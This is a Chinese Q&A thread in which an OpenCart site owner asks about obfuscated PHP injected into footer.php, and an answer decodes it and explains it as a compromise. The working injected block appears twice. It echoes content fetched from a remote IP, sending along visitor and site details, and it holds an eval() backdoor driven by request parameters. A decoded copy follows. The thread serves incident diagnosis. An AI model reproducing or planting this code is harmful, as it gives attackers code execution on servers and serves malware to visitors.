PHP - 代码添加到footer.php

时间:2015-04-03 17:25:44

标签: php opencart

我使用OpenCart创建了网站,但footer.php中突然出现了一段垃圾代码,导致网站崩溃。

代码如下:

// Injected block as found in footer.php, still obfuscated. What the code and its base64 literals show:
//  - error_reporting(0) and display_errors "0" keep any warning raised by this block off the page.
//  - $ie7be30e6 is a run-once guard around the whole body.
//  - $GLOBALS['_1208357119_'] stores function names (preg_match, file_get_contents, urlencode, md5,
//    stripslashes) decoded from base64 literals split into fragments, so no name appears in clear text.
//  - _682313165($i) is a string table: it returns the i-th base64-decoded constant (superglobal keys,
//    URL fragments, a fixed hash input and the marker value compared against a request parameter).
//  - The echo prints the body returned by a remote URL built from the site's host name and request URI
//    and the visitor's User-Agent and address.
//  - The last statement passes the request parameter "c" through stripslashes() into eval() when the
//    request parameter "p" loosely equals the marker, i.e. the request itself supplies the PHP to run.
// Traits useful when searching other files for the same injection: base64_decode() on concatenated
// fragments, calls through a numerically named $GLOBALS array, and eval() on a $_REQUEST value.
error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) 
.$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }

// Second occurrence of the injected block in the same file; it appears to repeat the first one unchanged.
// NOTE(review): the body is wrapped in if (!isset($ie7be30e6)), so if both copies execute in the same
// variable scope this copy skips its body, including the nested function declaration — confirm against
// how footer.php is included.
error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) 
.$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }

以上代码会被自动添加到文件中,网站也随之无法访问。

任何人都可以解释为什么会发生这种情况吗?

1 个答案:

答案 0 :(得分:2)

这是混淆的PHP。可能会发生以下两件事之一:

  1. 您的网站或主机遭到入侵。
  2. 您的主机提供商正在使用工具来获取您网站上的指标。
鉴于这段编码后的PHP中包含的主机IP已被Barracuda Networks列入黑名单(blacklist),很可能是您的网站或您的主机已被入侵。请与您的主机提供商联系并关闭您的网站,因为它可能正在向访问您网站的任何人传播恶意软件。

    如果该主机的IP段近期发生过变更、只是最近才被列入黑名单,那么这一判断也可能有误。

    我是如何确定的?

    • 用 Prettify PHP 整理代码格式,让它更容易理解
    • 手动解码所有Base64字符串,以了解数组的构造方式。
    • 重建字符串以创建对外部服务器的URL请求。

    一旦你最终解码了所有内容,那么代码最终会像这样:

    不要运行这段代码

    // Decoded reading copy of the injected block: every base64 literal is replaced by its plain value.
    // The decoded strings are shown without quotes, so this listing is meant to be read, not parsed as PHP.
    // Error reporting and error display are switched off, so a failure in this block shows nothing on the page.
    error_reporting(0);
    ini_set("display_errors", "0");
    
    // Run-once guard: the body executes only while $ie7be30e6 is still unset.
    if (!isset($ie7be30e6)) {
        $ie7be30e6 = TRUE;
    
        // Function names held in a global array and called by index in the obfuscated original,
        // which keeps the names out of the file's clear text.
        $GLOBALS['_1208357119_'] = Array(preg_match, file_get_contents, file_get_contents,
            urlencode, urlencode, md5, stripslashes
        );
    
        // String table: returns the constant at index $i (superglobal keys, URL fragments,
        // a fixed hash input and the marker value checked at the end of the block).
        function _682313165($i)
        {
            $a = Array(
                client_check, client_check, HTTP_ACCEPT_CHARSET, !.!u, SCRIPT_FILENAME, UTF-8,
                windows-1251, HTTP_ACCEPT_CHARSET, http://, 85.25.20.21/get.php?d=, SERVER_NAME,
                REQUEST_URI, &u=, HTTP_USER_AGENT, &c=, &i=1&ip=, REMOTE_ADDR, &h=,
                864a19cbdc025b4d3cc5f3127c17aa86, SERVER_NAME, REQUEST_URI, HTTP_USER_AGENT,
                1, p, p, e7be30e6
            );
            return $a[$i];
        }
    
        // If the request carries a non-empty client_check cookie, stop here and print the cookie value as-is.
        // Nothing in this block sets that cookie.
        if (!empty($_COOKIE[client_check]))
            die($_COOKIE[client_check]);
    
        // Choose a charset label for the outgoing request. $yf60436_0 is not assigned anywhere in this
        // block, so the first branch is the one taken: the current script's source is read and matched
        // against !.!u (the u modifier makes the match fail on bytes that are not valid UTF-8).
        if (!isset($yf60436_0[HTTP_ACCEPT_CHARSET])) {
            if (preg_match(!.!u, file_get_contents($_SERVER[SCRIPT_FILENAME])))
                $yf60436_1 = UTF-8;
            else 
                $yf60436_1 = windows-1251;
        } else 
            $yf60436_1 = $yf60436_0[HTTP_ACCEPT_CHARSET];
    
        // Requests a URL on the remote host and echoes the response body straight into the page.
        // The query string carries the site's host name and request URI, the visitor's User-Agent and
        // address, the charset label, and an md5 over a fixed string combined with those same values.
        // As posted, the line has no "." after '&u=' and no closing ";".
        echo file_get_contents('http://85.25.20.21/get.php?d=' . urlencode($_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) . '&u=' urlencode($_SERVER[HTTP_USER_AGENT]) . '&c=' . $yf60436_1 . '&i=1&ip=' . $_SERVER[REMOTE_ADDR] . '&h=' . md5(864a19cbdc025b4d3cc5f3127c17aa86 . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI] . $_SERVER[HTTP_USER_AGENT] . $yf60436_1 . 1))
    
        // Assigned but not read again in this block.
        $yf60436_2 = 3142;
    
        // Backdoor: when request parameter p loosely equals e7be30e6, request parameter c is passed
        // through stripslashes() into eval(). The PHP that runs comes from the incoming request itself,
        // not from the response fetched above.
        if (isset($_REQUEST[p]) && $_REQUEST[p] == e7be30e6)
            eval(stripslashes($_REQUEST["c"]));
    }
    

    不要运行这段代码

    我没有让它完全可以运行,因为我故意省略了部分语法成分。我提供这段代码是为了让你和其他人了解它的工作方式。永远不要运行任何你不信任或不理解的东西;如果你不理解它,就请教别人!

    这段代码在做什么?

    概括来说,整体流程是:

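    • 检查cookie,如果不存在则创建一个(代码运行两次)。
      • 注:按上面解码后的代码,当名为client_check的cookie非空时,脚本会原样输出该cookie的内容并终止;代码中看不到创建cookie的语句。
    • 检查当前运行文件的路径,以确定运行该站点的服务器类型(Windows或Linux)
      • 这决定了HTTP服务器上的可用字符集。
      • 注:从代码看,它读取的是当前脚本文件的内容,并用正则 !.!u 进行匹配,据此在UTF-8和windows-1251两个字符集标签之间选择;windows-1251是一种字符编码的名称,并不代表Windows操作系统。
    • 使用描述您的服务器和访问者的URI参数(主机名、请求URI、User-Agent、访问者IP等)从外部源获取内容,并把返回的内容直接输出(echo)到页面中。
    • 确定发布的信息是否符合条件
    • 如果响应匹配,请运行下载的文件。
      • 注:从代码看,判断条件是请求参数p等于e7be30e6,而eval执行的是请求参数c的内容,并不是上一步从外部获取的内容。这相当于一个可由请求直接触发的代码执行后门,因此清理时除了删除这段代码,还需要查明它是通过什么途径被写入footer.php的。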